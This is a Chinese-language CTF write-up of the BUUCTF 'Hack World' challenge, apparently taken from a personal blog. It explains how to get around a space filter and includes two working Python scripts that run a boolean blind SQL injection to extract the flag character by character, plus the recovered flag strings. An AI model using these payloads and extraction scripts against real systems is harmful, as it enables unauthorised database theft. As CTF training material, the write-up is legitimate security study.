1. Hack World

1. 整体流程

  1. Fuzz黑名单
  2. 布尔盲注

2. 题目分析

  1. 常规sql查询
1'
1' or 1=1#
1=1

发现做了过滤,再进一步Fuzz一下,发现空格被过滤了,后台语句可以判断(1=1)。
payload:

if(substr((select(flag)from(flag)),11)='f,1,2)
  1. 表名flag与列名flag都是题目所给出的
    Alt text

如果返回正确,则返回值为1(Hello, glzjin wants a girlfriend.)
如果返回错误,则返回值为2(Do you want to be my girlfriend?)
盲注脚本如下:

import requests

url = "http://3a375194-a3f5-4e1e-afe4-8e997044d03e.node2.buuoj.cn.wetolink.com/index.php"
flag = ""
str = "abcdefghijklmnopqrstuvwxyz0123456789-_{}"
for i in range(60):
    for j in str:
        payload = "if(substr((select(flag)from(flag)),{},1)='{}',1,2)".format((i+1),j)
        data = {'id': payload}
        a = requests.post(url,data=data)
        b = a.text
        if "Hello" in b:
            flag = flag + j
            print(flag)

然后跑出来一个flag,发现交不上去。仔细查看发现flag里面的-没能跑出来。然后到题目里面测了一下,发现-居然被过滤了(辣鸡出题人)。想了半天把脚本改进了一下,用python列表的方式去跑,终于把flag跑出来了。下次做布尔盲注的时候还是把值转为ascii再跑比较好,直接跑字符,遇到过滤的话就很麻烦。

import requests

url = "http://b9be93db-7e33-4e8d-9dd0-5dc5e814f15c.node2.buuoj.cn.wetolink.com/index.php"
flag = ""
list = [45, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102, 123, 125]
for i in range(60):
    for j in list:
        payload = "if(ascii(substr((select(flag)from(flag)),{},1))='{}',1,2)".format((i+1),j)
        data = {'id': payload}
        a = requests.post(url,data=data)
        b = a.text
        if "Hello" in b:
            flag = flag + chr(j)
            print(flag)
#flag{fde6135051284b1792759b37992f15a8}
#flag{fde61350-5128-4b17-9275-9b37992f15a8}
Last modification:February 5th, 2020 at 03:22 pm
给肥宅一点零花钱买可乐叭 (゜-゜)つロ